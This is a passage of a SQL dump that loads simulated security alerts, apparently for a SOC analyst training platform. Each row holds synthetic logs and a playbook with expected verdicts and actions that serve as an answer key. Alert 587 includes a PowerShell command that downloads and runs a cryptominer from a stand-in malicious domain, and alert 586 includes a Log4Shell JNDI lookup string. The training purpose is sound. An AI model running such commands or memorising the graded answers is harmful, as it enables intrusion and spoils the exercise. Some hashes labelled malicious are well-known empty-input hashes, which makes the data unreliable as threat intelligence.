X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(584, 'Privileged Account Escalation Attempt', 'high', 'Privilege Access Management Logs', 'An attempt was detected where an attacker tried to escalate privileges to access restricted areas of the network and sensitive data. This is an intermediate level attempt at privilege escalation.', 'Privilege Escalation', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":4625,\"event_type\":\"Audit Failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"username\":\"john_doe\",\"domain\":\"CORP\",\"logon_type\":10,\"status\":\"0xC000006A\",\"sub_status\":\"0xC0000064\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"attempted_action\":\"Privilege Escalation\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal machine targeted for privilege escalation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Existing user attempting unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit 
Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(585, 'Detected Data Anomalies in Backup Systems', 'high', 'Backup System Logs', 'Anomalous data modification detected in backup systems, indicating potential tampering activity aimed at covering tracks post data exfiltration. Changes were made to the backup files shortly after unauthorized access was recorded. Observations indicate the presence of malicious IPs and altered backup files.', 'Impact', 'T1485 - Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:15:27Z\",\"event_id\":\"4672\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"username\":\"backup_admin\",\"action\":\"modify\",\"file_modified\":\"/backup/weekly-full/2023-10-14.bak\",\"hash_before\":\"5d41402abc4b2a76b9719d911017c592\",\"hash_after\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"anomalies_detected\":true,\"related_malware\":\"APT29\",\"severity\":\"high\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in backup operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/backup/weekly-full/2023-10-14.bak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Logs\",\"verdict\":\"suspicious\",\"details\":\"Backup file modified during unauthorized access window.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"clean\",\"details\":\"Original hash of the backup file before 
modification.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"malicious\",\"details\":\"Modified hash indicating tampering with the backup file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(586, 'Initial Access: JNDI Injection Detected', 'critical', 'Web Application Firewall Logs', 'Anomalous traffic patterns have been identified which indicate a JNDI injection attempt targeting a critical Java-based application. The attempt is likely leveraging the Log4Shell vulnerability for initial access.', 'Exploit', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.75\",\"request_uri\":\"/vulnerable-endpoint\",\"http_method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"referrer\":\"http://example.com/malicious-page\",\"jndi_string\":\"ldap://203.0.113.45:1389/Exploit\",\"malicious_indicator\":\"exploit.jar\",\"transaction_id\":\"abc123def456ghi789\",\"status_code\":200}', '2026-01-08 22:09:09', '2026-02-16 18:07:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical Java-based application server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.jar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Log4Shell exploitation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(587, 'Execution: Cryptominer Deployment Identified', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The EDR system identified the execution of a known cryptomining payload. The attacker utilized their access to deploy the cryptominer \'xmrig.exe\' on the target system, exploiting system resources for illicit mining activities. The activity was flagged due to anomalous process creation and outbound connections to a known mining pool.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/malware/xmrig.exe -OutFile C:\\\\Users\\\\Public\\\\xmrig.exe; Start-Process C:\\\\Users\\\\Public\\\\xmrig.exe\\\"\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"compromised_user\",\"file_name\":\"xmrig.exe\",\"external_ip\":\"198.51.100.23\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known cryptomining pool IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a cryptominer executable.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"xmrig.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used name for cryptomining 
software.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing anomalous behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(588, 'Persistence: Backdoor Creation Alert', 'high', 'System Event Logs', 'To ensure continued access, a sophisticated backdoor is deployed, blending into normal traffic and evading basic security measures.', 'Backdoor', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T15:23:43Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"filename\":\"svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"New service installed for persistence.\",\"service_name\":\"WinSvcHelper\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious logon activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious file mimicking a legitimate Windows process.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 